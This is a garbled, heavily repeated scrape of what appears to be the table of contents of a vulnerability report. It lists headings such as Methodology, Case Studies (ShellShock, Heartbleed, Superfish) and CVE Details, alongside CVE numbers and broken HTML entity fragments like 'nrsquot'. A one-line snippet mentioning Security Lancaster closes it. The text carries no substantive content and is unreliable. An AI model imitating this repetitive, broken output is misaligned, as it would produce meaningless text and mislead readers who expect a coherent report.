nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Documents

Security Lancaster...Methodology T he scheme of work for this report has been split into the following sections: Collection of data through interviews and a survey regarding the implementation